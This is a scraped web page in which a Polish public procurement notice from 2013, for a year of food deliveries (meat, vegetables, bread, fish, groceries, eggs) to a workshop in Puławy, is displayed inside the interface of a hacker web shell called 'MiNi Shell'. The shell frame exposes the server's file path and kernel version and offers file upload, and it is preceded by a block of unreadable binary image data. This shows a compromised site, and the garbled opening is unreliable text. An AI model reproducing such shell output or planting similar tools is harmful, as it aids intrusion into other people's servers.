JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131220/278347-N-2013.html

<p class="kh_header"><b>Puławy: Dostawa w 2014 r. produktów spożywczych dla potrzeb Zakładu Aktywności Zawodowej przy Puławskim Stowarzyszeniu Ochrony Zdrowia Psychicznego, ul. Mickiewicza 2a, 24-100 Puławy</b><br>
<b>Numer ogłoszenia: 278347 - 2013; data zamieszczenia: 20.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Aktywności Zawodowej przy Puławskim Stowarzyszeniu Ochrony Zdrowia Psychicznego , ul. Mickiewicza 2a, 24-100 Puławy, woj. lubelskie, tel. 81 888 57 95, faks 81 888 57 95.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zaz.pulawy.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Zamawiający nie przewiduje dynamicznego systemu zakupów</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: stowarzyszenie.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa w 2014 r. produktów spożywczych dla potrzeb Zakładu Aktywności Zawodowej przy Puławskim Stowarzyszeniu Ochrony Zdrowia Psychicznego, ul. Mickiewicza 2a, 24-100 Puławy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa w 2014 roku artykułów żywnościowych dla Zakładu Aktywności Zawodowej w określonych ilościach i częściach. Podane ilości produktów składających się na przedmiot zamówienia w danej jego części stanowią wielkości szacunkowe, ustalone dla miesięcznych potrzeb Zamawiającego. Przedmiot zamówienia składa się z 6 części tj: Część 1 dostawa mięsa i wędlin,Część 2 dostawa warzyw i owoców, Część 3 dostawa pieczywa,Część 4 dostawa ryb, Część 5 dostawa artykułów spożywczych,Część 6 dostawa jaj. Zamawiający dopuszcza składanie ofert częściowych..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 7 Pzp, w zakresie każdej części zamówienia, obejmującej produkty należące do tej kategorii zamówienia, które w opisie przedmiotu zamówienia nie zostały wyszczególnione, w ilościach i wartości zgodnej z Pzp bądź też zwiększenia ilości asortymentu w stosunku do wielkości opisanych dla poszczególnych części zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1, 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie	wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie	wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany postanowień umowy wymagają formy pisemnej pod rygorem nieważności. Zamawiający, zgodnie z art. 144 ustawy - Prawo zamówień publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty polegających na:- spowodowanej warunkami atmosferycznymi - w przypadku wystąpienia klęski żywiołowej lub gdy warunki atmosferyczne odbiegają od warunków normalnych, - okoliczności powodujące zmniejszenie zakresu przedmiotu zamówienia; w przypadku zmniejszenia zakresu przedmiotu zamówienia przez Zamawiającego, wynagrodzenie należne Wykonawcy za wykonane zamówienie pozostaje w takim stosunku do umownego wynagrodzenia, w jakim wykonane dostawy pozostają do całości zamówienia określonego umową; 
- zmianie warunków płatności na rzecz Wykonawcy,- zmianie spowodowanej wystąpieniem siły wyższej, czyli zdarzenia, którego Strony nie mogły przewidzieć i któremu nie mogły zapobiec, ani któremu nie mogą przeciwdziałać, a które uniemożliwia Wykonawcy wykonanie w części lub całości jego zobowiązań, 
- zamawiający dopuszcza zmianę ceny zamówienia brutto (ceny ofertowej) w przypadku urzędowej zmiany stawki podatku VAT. Stawka podatku VAT określana jest zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz. U. z 2011 r. Nr 177 poz. 1054 z późn. zm.)zmianie podwykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zaz.pulawy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Puławskie Stowarzyszenie Ochrony Zdrowia Psychicznego - Zakład Aktywności Zawodowej w Puławach, ul. Mickiewicza 2a, 24-100 Puławy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.12.2013 godzina 09:00, miejsce: Puławskie Stowarzyszenie Ochrony Zdrowia Psychicznego - Zakład Aktywności Zawodowej w Puławach, ul. Mickiewicza 2a, 24-100 Puławy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa mięsa i wędlin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa codziennie od poniedziałku do piątku do godziny 8.00, faktury codziennie, termin płatności - 14 dni, sposób zamawiania- fax, telefonicznie
L.p.:	Asortyment:		Ilość:
      Mięso i wędliny:		
1.	Antrykot	kg	3,
2.	Boczek wędzony b/k	kg	25,
3.	Ćwiartka z kurczaka	kg	238,
4.	Karczek wp b/k	kg	42,
5.	Kaszanka	kg	8,
6.	Kiełbasa podwawelska	kg	5,
7.	Kiełbasa swojska	kg	5,
8.	Kiełbasa zwyczajna	kg	42,
9.	Kiełbasa biała	kg	3,
10.	Kiełbasa debreczyńska	kg	50,
11.	Korpus drobiowy	kg	83,
12.	 Kura rosołowa	kg	4,
13.	Luncheon meat	kg	1,
14.	Łopatka wieprzowa b/k	kg	81
15.	Mięso gulaszowe	kg	1,
16.	Mięso mielone firmowe	kg	298,
17.	Mortadela	kg	76,
18.	Pasztet domowy	kg	4,
19.	Parówki drobiowe	kg	6,
20.	Pasztetowa	kg	2,
21.	Piersi drobiowe	kg	197,
22.	Płaty boczkowe	kg	11,
23.	Polędwica indycza	kg	1,
24.	Salami	kg	1,
25.	Schab	kg	70,
26.	Skrzydło indycze	kg	3,
27.	Słonina	kg	13,
28.	Szynka Lux	kg	6,
29.	Szynka wędzona wiejska	kg	7,
30.	Uda drobiowe	kg	1,
31.	Wątroba drobiowa	kg	20,
32.	Wątroba wp  	kg	1,
33.	Szynka z piersi drobiowa 	kg	15,
34.	Baleron	kg	1,
35.	Polędwica sopocka	kg	1,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa warzyw i owoców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa 2 razy w tygodniu, do godziny 6.00, faktury 2 razy w tygodniu, termin płatności - 14 dni, sposób zamawiania - fax, telefonicznie.
L.p.	Asortyment:		Ilość:
     Warzywa i owoce:		
1.	Brokuł	szt.	50,
2.	Burak ćwikłowy	kg	46,
3.	Cebula	kg	53,
4.	Czosnek	szt	10,
5.	Kalafior	szt.	44,
6.	Kapusta biała	kg	61,
7.	Kapusta kiszona	kg	130,
8.	Kapusta pekińska	kg	98,
9.	Kapusta czerwona	kg	92,
10.	Marchew	kg	300,
11.	Nać kopru	szt.	17,
12.	Natka pietruszki	szt.	32,
13.	Ogórek kiszony	kg	36,
14.	Ogórek	kg	106,
15.	Papryka czerwona	kg	52,
16.	Pietruszka	kg	39,
17.	Pieczarka	kg	57,
18.	Pomidory	kg	32,
19.	Por	szt.	141,
20.	Sałata	szt.	72,
21.	Seler	kg	43,
22.	Ziemniaki	kg	2679,
23.	Jabłka	kg	78,
24.	Cukinie	kg	30,
25.	Szczypior	szt	44,
26.	Rzodkiewka	szt	10,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa pieczywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa codziennie od poniedziałku do piątku, do godziny 8.00, faktury zbiorcze co 10 dni, termin płatności - 14 dni, sposób zamawiania - fax, telefonicznie.
L.p.:	Asortyment:		Ilość:
       pieczywo:		
1.	Bułka zwykła	szt.	587,
2.	Chleb baltonowski	szt.	22,
3.	Chleb graham	szt.	5,
4.	Chleb mieszany  razowy	szt.	30,
5.	Chleb regionalny krojony	szt.	318,
6.	Chleb mieszany sit.-soj.	szt.	24,
7.	Chleb mieszany wileński	szt.	17,
8.	Chleb słonecznikowy	szt.	5
9.	Chleb Leo	szt.	7,
10.	Chleb cesarski	szt.	12,
11.	Chleb żytni jasny	szt.	8,
12.	Chleb dworski	szt.	5,
13.	Chleb młodości	szt.	4,
14.	Chleb ze wsi	szt.	28,
15.	Chleb złocisty	szt.	6,
16.	Drożdówka	szt.	83,
17.	Bułka śniadaniowa	szt.	160,
18.	Chleb ziarnisty smakowity	szt.	7,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa ryb.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa 1 raz w tygodniu, od poniedziałku do piątku, do godziny 10.00, faktura 1 raz w tygodniu, termin płatności - 14 dni, sposób zamawiania - fax, telefonicznie
L.p.:	Asortyment	j.m.:	Ilość:
          ryby	:	
1.	Dorsz filet	kg	47,
2.	Miruna filet	kg	5,
3.	Matjas śledź	kg	9,
4.	Śledzie po kaszubsku	kg	2,
5.	Łosoś sałatkowy	kg	1,
6.	Łosoś filet mrożony	kg	1,
7.	Koreczki śledziowe 	szt	6,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa artykułów spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa 1 raz w tygodniu, w godzinach pracy Zamawiającego, faktury 1 raz w tygodniu, termin płatności - 14 dni, sposób zamawiania - fax, telefonicznie.
L.p.;	Asortyment:	 Ilość:
1.	Drożdże 100g	2,
2.	Masło 200 g	34,
3.	Mleko 2% 1l	59,
4.	Rama combi profit 3,7l	1,
5.	Rama cremefine 15% 1l	46,
6.	Ser żółty gouda 1 kg	13,
7.	Serek topiony hochland krążek 200 g	14,
8.	Śmietana 18% 400ml	172,
9.	Twaróg półtłusty 1 kg	45,
10.	Barszcz biały 1 kg	6,
11.	Cukier kryształ 1 kg	50,
12.	Cukier puder 400 g	9,
13.	Curry 20 g	4,
14.	Dżem 280g	3
15.	Fasola Jas karłowy 0,5 kg	53,
16.	Groch łuskany 0,5 kg	13,
17.	Groszek konserwowy 0,4 g	26,
18.	Herbata saga 1 opak. (300 szt.)	1,
19.	Jabłka prażone 0,9 kg	22,
20.	Kasza gryczana 0,9 kg	3,
21.	Kasza jęczmienna 5 kg	12,
22.	Keczup 1 kg	3,
23.	Koncentrat pomidorowy 900 g	23,
24.	Koncentrat barszczu 0,3 l	2,
25.	Kotlet sojowy 100 g	30,
26.	Kukurydza konserwowa 425 ml	30,
27.	Majonez 0,7 kg	24,
28.	Mąka pszenna 1kg	66,
29.	Mąka ziemniaczana 1 kg	17,
30.	Musztarda 180 g	2,
31.	Ocet 0,5 l	5,
32.	Ogórek konserwowy 0,9 l	15,
33.	Olej 0,9 l	66,
34.	Papryka konserwowa 720 g	4,
35.	Paprykarz szczeciński 300 g	14,
36.	Ryż 1 kg	79,
37.	Soczewica 0,4 kg	10,
38.	Sól  1kg	50,
39.	Szczaw konserwowy 300 g	17,
40.	Szprot w sosie pomidorowym 170 g	6,
41.	Śledź w pomidorach 170 g	3,
42.	Tuńczyk w oleju 170 g	3,
43.	Żelatyna 50g	17,
44.	Aroma mix maślano-ziołowy 1,1 kg	1,
45.	Consomme pasta  1,2 kg	2,
46.	Bulion grzybowy 1,2 kg	1,
47.	Bulion drobiowo-wołowy 1,2 kg	1,
48.	Cukier waniliowy 16 g	30,
49.	Bułka tarta 0,5 kg	26,
50.	Cynamon 150 g	6,
51.	Czosnek granulowany 0,5 kg	3,
52.	Delikat do grilla 500 g	1,
53.	Fix meksykański 1,1 kg	1,
54.	Fix do gulaszu 1,1 kg	3,
55.	Fix do potraw chińskich 1,1 kg	1,
56.	Chrzan 0,3 kg	11,
57.	Kminek 20 g	25
58.	Kwasek cytrynowy 20 g	1,
59.	Liść laurowy 0,5 kg	1,
60.	Majeranek 0,5 kg	1,
61.	Makaron kokardki durum 2 kg	15,
62.	Makaron lasagne  durum 2 kg	13,
63.	Makaron łazanki  durum 2 kg	9,
64.	Makaron nitka cięta  durum 2 kg	6,
65.	Makaron spaghetti  durum 1 kg	26,
66.	Makaron świderki  durum 2 kg	15,
67.	Makaron wstążka  durum 2 kg	13,
68.	Marynata do drobiu 700 g	1,
69.	Marynata do wieprzowiny 750 g	2,
70.	Papryka ostra 0,5 kg	1,
71.	Papryka słodka 0,5 kg	1,
72.	Peperonata 2,5 kg	1,
73.	Pieprz czarny 0,5 kg	4,
74.	Pieprz ziołowy 0,5 kg	4,
75.	Przyprawa do mięs i grilla maggi  1,1  kg	1,
76.	Ziele angielskie 0,5 kg	1,
77.	Przyprawa do bigosu 0,5 kg	6,
78.	Przyprawa do kurczaka 0,5 kg	3,
79.	Przyprawa do mięs 0,5 kg	5,
80.	Przyprawa do ryb 0,5 kg	1,
81.	Przyprawa delikat 1 kg	1,
82.	Przyprawa gyros 500 g	1,
83.	Przyprawa jarzynka 2,8 kg	5,
84.	Sekret szefa drobiowy 0,8 kg	1,
85.	Sekret szefa wołowy 0,9 kg	1
86.	Przyprawa w płynie 0,96 g	10,
87.	Rosół drobiowy 1,2 kg	1,
88.	Rosół o smaku wędzonki 1 kg	1,
89.	Soda oczyszczona 70 g	2,
90.	Sos bolognese 0,9 kg	3,
91.	Sos myśliwski 1,1 kg	1,
92.	Sos sał. czosnkowy 0,9 kg	1,
93.	Sos sał. grecki 0,7 kg	1,
94.	Sos słodko-kwaśny 1,5 kg	1,
95.	Sos sał. koperkowy 0,8 kg	1,
96.	Sos sał. ogrodowy 0,7 kg	1,
97.	Sos serowy 1,1 kg	3,
98.	Sos serowy brokułowy 0,9kg	1,
99.	Sos sojowy 150 ml	2,
100.	Sos sał. włoski 0,7 kg	2,
101.	Sos tomato pronto 2 kg	1,
102.	Sos węgierski 1,2 kg	1,
103.	Sos z grzybów leśnych maggi 0,9 kg	3,
104.	Napój herbaciany 1kg	200,
105.Tymianek 10 g	2,
106.	Zioła prowansalskie maggi 700 ml	2,
107.	Zupa borowikowa 0,9 kg	4,
108.	Zupa barszcz czerwony 1,3 kg	3,
109.	Zupa cebulowa 1,2 kg	3,
110.	Baza do zup miesnych 3 kg	3,
111.	Zupa pieczarkowa 0,9 kg	3,
112.	Zupa żur 0,9 kg	5,
113.	Bazylia	11,
114.	Oregano	11,
115.	Sos carbonara	1,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa jaj.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa 1 raz w tygodniu, w godzinach pracy Zamawiającego, faktury 1 raz w tygodniu, termin płatności - 14 dni, sposób zamawiania - fax, telefonicznie.
L.p.	Asortyment:	  j.m.	Ilość:
         Jaja:		
1	Jaja  1szt.	szt	1400,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com